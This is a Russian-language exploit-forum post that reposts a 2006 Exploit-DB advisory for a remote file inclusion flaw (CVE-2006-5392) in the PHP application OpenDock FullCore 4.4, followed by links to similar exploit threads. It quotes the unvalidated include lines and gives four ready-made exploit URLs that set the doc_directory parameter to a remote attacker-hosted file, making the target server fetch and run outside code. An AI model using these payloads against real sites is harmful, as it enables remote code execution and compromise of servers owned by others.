Exploit OpenDock FullCore 4.4 - Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2570
Проверка EDB
  1. Пройдено
Автор
MATDHULE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5392
Дата публикации
2006-10-16
Код: 
---------------------------------------------------------------------------------
OpenDock FullCore <= v4.4 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author : Matdhule

Contact : [email protected]

Application : OpenDock FullCore

Version : 4.4

Download : http://web.opendock.net//up_file/opendock_full_core_44_66_od.zip

---------------------------------------------------------------------------------

Vulnerability:

In folder sw we found vulnerability script index_sw.php.

-----------------------index_sw.php---------------------------------
<?php

include $doc_directory.$path_sw."lib_config/lib_sys_config.php";
include $doc_directory.$path_sw."lib_main/lib_main.php";

-------------------------------------------------------------------------

Input passed to the "$doc_directory" parameter in index_sw.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

sw/lib_cart/cart.php
sw/lib_cart/lib_cart.php
sw/lib_cart/lib_read_cart.php
sw/lib_cart/lib_sys_cart.php
sw/lib_cart/txt_info_cart.php
sw/lib_comment/comment.php
sw/lib_comment/find_comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php

And many others files...

---------------------------------------------------------------------------------

Exploit :

http://target.com/[OpenDockFullCore_Path]/sw/index_sw.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/lib_cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt ?

---------------------------------------------------------------------------------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, bius, thama & all crews #nyubicrew, #e-c-h-o, @dalnet

# milw0rm.com [2006-10-16]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion
Ответы
0
Просмотры
255
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion
Ответы
0
Просмотры
253
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion
Ответы
0
Просмотры
265
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
Ответы
1
Просмотры
1K
Эксплойты & Уязвимости
meselem
M
Exploiter
Exploit Webutler v3.2 - Remote Code Execution (RCE)
Ответы
0
Просмотры
613
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Ответы
0
Просмотры
596
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SPIP v4.2.0 - Remote Code Execution (Unauthenticated)
Ответы
0
Просмотры
897
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Ответы
0
Просмотры
605
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Best POS Management System v1.0 - Unauthenticated Remote Code Execution
Ответы
0
Просмотры
591
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу